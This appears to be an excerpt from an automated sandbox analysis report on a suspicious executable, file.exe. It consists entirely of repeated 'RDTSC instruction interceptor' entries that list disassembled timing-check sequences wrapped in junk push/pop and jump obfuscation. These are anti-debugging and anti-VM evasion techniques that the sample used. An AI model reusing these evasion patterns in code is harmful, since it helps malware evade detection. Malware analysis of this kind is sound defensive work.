Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64753E second address: 647542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6484CE second address: 6484D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6484D2 second address: 6484FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB418E8531Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FB418E85318h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6484FC second address: 648502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 648502 second address: 648506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 64AEB1 second address: 64AEB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F2715 second address: 5F2727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007FB418E85316h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F2727 second address: 5F272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6502A4 second address: 6502AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB418E85316h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6502AF second address: 6502B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6502B5 second address: 6502BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6502BE second address: 6502C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6502C2 second address: 6502CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB418E85316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6503F9 second address: 6503FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6503FF second address: 650418 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FB418E8531Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65631D second address: 656321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 656321 second address: 656334 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CF49 second address: 65CF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C48B second address: 65C491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C6F5 second address: 65C733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB418C0B136h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418C0B137h 0x00000011 jmp 00007FB418C0B12Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C733 second address: 65C73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C864 second address: 65C881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FB418C0B12Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FB418C0B126h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C881 second address: 65C88B instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65C88B second address: 65C891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CC4B second address: 65CC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007FB418E85316h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007FB418E8531Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CDEE second address: 65CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CDF4 second address: 65CE04 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB418E85316h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 65CE04 second address: 65CE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7637 second address: 5F763B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F763B second address: 5F7646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F7646 second address: 5F7668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007FB418E8531Eh 0x0000000b jnp 00007FB418E85316h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push ebx 0x00000016 jmp 00007FB418E8531Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6677F6 second address: 66780E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB418C0B126h 0x00000009 je 00007FB418C0B126h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66780E second address: 66784D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85323h 0x00000009 popad 0x0000000a jmp 00007FB418E8531Ch 0x0000000f pushad 0x00000010 jc 00007FB418E85316h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jo 00007FB418E85316h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jnl 00007FB418E85316h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E857B second address: 5E8591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB418C0B131h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8591 second address: 5E859D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418E8531Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E859D second address: 5E85A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E85A5 second address: 5E85AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6666D0 second address: 6666DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418C0B126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6666DA second address: 6666EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB418E8531Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6666EB second address: 6666F9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418C0B128h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6666F9 second address: 6666FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 630335 second address: 63034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418C0B135h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6303B7 second address: 6303F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FB418E85326h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e jbe 00007FB418E8532Fh 0x00000014 pushad 0x00000015 jmp 00007FB418E85321h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 630DBB second address: 630DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB418C0B130h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6156DA second address: 6156E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6156E0 second address: 6156E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 666AEC second address: 666AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 666AF0 second address: 666AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66714D second address: 667153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 667153 second address: 667157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 667157 second address: 66716C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB418E8531Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66DBA7 second address: 66DBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66DBAC second address: 66DBB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66DBB2 second address: 66DBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 66DBB6 second address: 66DBC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FB418E85316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 67324E second address: 673253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 673253 second address: 673262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007FB418E85316h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 673262 second address: 673268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 673268 second address: 6732B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FB418E85316h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edx 0x00000011 jns 00007FB418E85316h 0x00000017 pop edx 0x00000018 push ebx 0x00000019 jmp 00007FB418E8531Ah 0x0000001e jmp 00007FB418E85327h 0x00000023 pop ebx 0x00000024 jng 00007FB418E8531Eh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6732B5 second address: 6732BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6736CC second address: 6736E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E8531Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 673F0D second address: 673F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 674063 second address: 674067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 672D70 second address: 672D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 676DB7 second address: 676DBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 679C0C second address: 679C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B134h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007FB418C0B126h 0x00000014 pop edx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 679C33 second address: 679C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6815F7 second address: 681610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B135h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 68037C second address: 6803CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FB418E85316h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB418E8531Dh 0x00000012 popad 0x00000013 jmp 00007FB418E85329h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB418E85325h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6803CA second address: 6803E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB418C0B126h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6803E3 second address: 6803E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6803E7 second address: 6803F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB418C0B126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6803F8 second address: 6803FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 680575 second address: 68057B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6308A3 second address: 63092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB418E85328h 0x0000000c nop 0x0000000d sub ecx, dword ptr [ebp+122D1D2Fh] 0x00000013 mov ebx, dword ptr [ebp+12485866h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FB418E85318h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 jmp 00007FB418E85322h 0x00000038 mov di, ax 0x0000003b add eax, ebx 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FB418E85318h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 mov dx, 81E9h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63092A second address: 630931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68096A second address: 68096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68096F second address: 68097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB418C0B126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68097B second address: 680985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812BE second address: 6812C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812C4 second address: 6812E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB418E85327h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812E8 second address: 6812EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6812EE second address: 68130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85320h 0x00000009 jo 00007FB418E85316h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6845EB second address: 6845F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683D4E second address: 683D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6842E5 second address: 6842FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FB418C0B132h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6842FD second address: 684307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB418E85316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6878E0 second address: 6878F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B12Ah 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687A79 second address: 687A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E46 second address: 687E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E4A second address: 687E50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E50 second address: 687E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687E56 second address: 687E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6903AC second address: 6903B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6903B0 second address: 6903D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FB418E85325h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6903D2 second address: 6903E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B12Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690CF3 second address: 690D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB418E85316h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690D02 second address: 690D0C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691545 second address: 69154A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
